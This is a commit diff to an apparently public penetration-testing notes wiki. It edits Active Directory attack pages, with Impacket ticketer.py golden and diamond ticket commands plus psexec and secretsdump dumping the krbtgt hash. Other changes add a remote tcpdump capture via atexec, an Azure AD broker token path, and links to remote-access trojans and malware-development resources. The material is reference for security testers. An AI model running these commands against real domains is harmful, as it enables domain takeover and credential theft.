[AHK] Automatic update 👽

SUMMARY.md

@@ -97,7 +97,7 @@
         * [PrintSpoofer](pentest/infrastructure/ad/privileges-abuse/seimpersonate/printspoofer.md)
       - [SeTrustedCredmanAccess](pentest/infrastructure/ad/privileges-abuse/setrustedcredmanaccess.md)
     * [RID Cycling](pentest/infrastructure/ad/rid-cycling.md)
-    * [SCCM Abuse](pentest/infrastructure/ad/sccm-mecm-abuse.md)
+    * [SCCM Abuse](pentest/infrastructure/ad/sccm-abuse.md)
     * [SMB](pentest/infrastructure/ad/smb.md)
     * [RPC](pentest/infrastructure/ad/rpc.md)
     * [Token Manipulation](pentest/infrastructure/ad/token-manipulation.md)

admin/linux/README.md

@@ -270,6 +270,16 @@ $ shred -zv -n0 /dev/sdc1
 
 
 
+## Recover Deleted Files
+
+```
+$ sudo grep -i -a -B100 -A100 'file contents to find' /dev/sda1 > recovered.bin
+$ strings recovered.bin
+```
+
+
+
+
 ## Partitions
 
 {% embed url="https://youtu.be/QSpGaeHlkoE" %}

pentest/c2/README.md

@@ -5,3 +5,13 @@
 * [https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd](https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd)
 
 {% embed url="https://docs.google.com/spreadsheets/d/1-A0WOlGh1GnhbfLP53M6vjYl1LCPyrqp/edit?usp=sharing&ouid=117220615455477620407&rtpof=true&sd=true" %}
+
+
+
+
+## RAT Tools
+
+- [https://breakingsecurity.net/remcos/](https://breakingsecurity.net/remcos/)
+- [https://jetlogger.app/](https://jetlogger.app/)
+- [https://github.com/quasar/Quasar](https://github.com/quasar/Quasar)
+- [https://github.com/moom825/xeno-rat](https://github.com/moom825/xeno-rat)

pentest/infrastructure/ad/README.md

@@ -63,6 +63,11 @@
 - [https://github.com/Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD)
 
 
+#### Winning GOAD
+
+- [[PDF] Winning the Game Of Active Directory (@techBrandon)](https://github.com/techBrandon/DC32-GOAD/blob/main/WinningGOAD.pdf)
+
+
 
 
 ## Bank Security Challenge

pentest/infrastructure/ad/attack-trusts.md

@@ -222,7 +222,7 @@ mimikatz # kerberos::golden /domain:child.megacorp.local /user:DC01$ /id:1 337 /
 {% endtab %}
 {% tab title="Linux" %}
 ```
-$ ticketer.py -domain child.megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups 516] [-user-id 1337] [-duration 3650] -extra-sid S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 'DC01$'
+$ ticketer.py -domain child.megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups 516] [-user-id 1337] [-duration 87600] -extra-sid S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 'DC01$'
 ```
 {% endtab %}
 {% endtabs %}

pentest/infrastructure/ad/dominance.md

@@ -42,7 +42,7 @@ Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megaco
 {% endtab %}
 {% tab title="Linux" %}
 ```
-$ ticketer.py -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 3650] snovvcrash
+$ ticketer.py -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 {-nthash <RC4_32> | -aesKey <AES_64> } [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
 $ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
 $ psexec.py megacorp.local/snovvcrash@DC01.megacorp.local -k -no-pass
 $ secretsdump.py megacorp.local/snovvcrash@DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
@@ -59,7 +59,7 @@ $ secretsdump.py megacorp.local/snovvcrash@DC01.megacorp.local -dc-ip 10.10.13.3
 - [https://thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond](https://thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
 
 ```
-$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 3650] snovvcrash
+$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> [-groups '512,513,516,518,519,520'] [-user-id 1337] [-duration 87600] snovvcrash
 ```
 
 
@@ -71,7 +71,7 @@ $ ticketer.py -request -user lowpriv -password 'Passw0rd!' -domain megacorp.loca
 - [https://pgj11.com/posts/Diamond-And-Sapphire-Tickets/](https://pgj11.com/posts/Diamond-And-Sapphire-Tickets/)
 
 ```
-$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -aesKey <AES_KEY> administrator
+$ ticketer.py -request -user lowpriv -password 'Passw0rd!' -impersonate administrator -domain megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -nthash <NT_HASH> -aesKey <AES_KEY> administrator
 ```
 
 

pentest/infrastructure/azure-ad/README.md

@@ -10,8 +10,15 @@
 
 ## OSINT
 
+- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
 - [https://aadinternals.com/osint/](https://aadinternals.com/osint/)
 
+OpenID configuration:
+
+```
+$ curl -s https://login.microsoftonline.com/<TENANT_ID>/v2.0/.well-known/openid-configuration | jq
+```
+
 
 
 
@@ -108,3 +115,13 @@ Check if MFA is forcefully enabled via [well-known client GUIDs](https://github.
 ```
 $ proxy roadrecon auth -u snovvcrash@megacorp.cloud -p 'Passw0rd!' -r https://outlook.office.com/ -c 1b730954-1685-4b74-9bfd-dac224a7b894 --tokens-stdout
 ```
+
+
+
+### AAD.BrokerPlugin
+
+- [https://habr.com/ru/articles/688426/](https://habr.com/ru/articles/688426/)
+
+```
+PS > ls C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*
+```

pentest/infrastructure/file-transfer.md

@@ -206,6 +206,14 @@ $ sudo pkill atftpd
 
 
 
+## ICMP
+
+- [https://github.com/icyguider/ICMP-TransferTools](https://github.com/icyguider/ICMP-TransferTools)
+- [https://snovvcrash.github.io/2019/04/05/htb-mischief.html](https://snovvcrash.github.io/2019/04/05/htb-mischief.html#icmpshellpy)
+
+
+
+
 ## Exfiltration / Infiltration
 
 - [https://xakep.ru/2022/09/22/infilltration-and-exfiltration/](https://xakep.ru/2022/09/22/infilltration-and-exfiltration/)

pentest/infrastructure/networks/sniff-traffic.md

@@ -16,7 +16,9 @@ $ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' &
 Windows:
 
 ```
+$ wget http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812
 $ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap'
+$ sleep 30m
 ```
 
 

redteam/maldev/README.md

@@ -25,6 +25,7 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}
 - [https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/](https://viuleeenz.github.io/posts/2024/02/understanding-peb-and-ldr-structures-using-ida-and-lummastealer/)
 - [https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html](https://fareedfauzi.github.io/2024/07/13/PEB-Walk.html)
 - [https://print3m.github.io/blog/x64-winapi-shellcoding](https://print3m.github.io/blog/x64-winapi-shellcoding)
+- [https://habr.com/ru/articles/808787/](https://habr.com/ru/articles/808787/)
 
 ![PE File Structure (by @Print3M)](https://print3m.github.io/imgs/x64-shellcoding-winapi/pe-structure.png)
 
@@ -69,3 +70,11 @@ $ msfvenom -p windows/messagebox TITLE="EICAR" TEXT="X5O!P%@AP[4\PZX54(P^)7CC)7}
 
 - [[PDF] Malware Development for Dummies (Cas van Cooten)](https://github.com/chvancooten/maldev-for-dummies/blob/main/Slides/Malware%20Development%20for%20Dummies%20-%20Hack%20in%20Paris%2030-06-2022%20%26%2001-07-2022.pdf)
 - [https://github.com/chvancooten/maldev-for-dummies](https://github.com/chvancooten/maldev-for-dummies)
+
+
+
+### Learning LLVM (sh4dy)
+
+- [https://sh4dy.com/2024/06/29/learning_llvm_01/](https://sh4dy.com/2024/06/29/learning_llvm_01/)
+- [https://sh4dy.com/2024/07/06/learning_llvm_02/](https://sh4dy.com/2024/07/06/learning_llvm_02/)
+- [https://github.com/0xSh4dy/learning_llvm](https://github.com/0xSh4dy/learning_llvm)

redteam/maldev/bof-coff.md

@@ -7,6 +7,7 @@ description: Beacon Object Files / Common Object File Format
 - [https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader/](https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader/)
 - [https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/](https://securityintelligence.com/posts/how-to-hide-beacon-during-bof-execution/)
 - [https://github.com/xforcered/bofmask](https://github.com/xforcered/bofmask)
+- [[PDF] Microsoft Portable Executable and Common Object File Format Specification (Microsoft Corporation)](https://courses.cs.washington.edu/courses/cse378/03wi/lectures/LinkerFiles/coff.pdf)
 
 Argument types for [bof_pack](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#bof_pack):
 

redteam/maldev/pic-shellcode.md

@@ -22,7 +22,7 @@ Start:
 ```
 {% endcode %}
 
-Compile runner with a Bash script (like [shcode2exe](https://github.com/accidentalrebel/shcode2exe)):
+Automated with Bash (like [shcode2exe](https://github.com/accidentalrebel/shcode2exe)):
 
 {% code title="bin2compile.sh" %}
 ```bash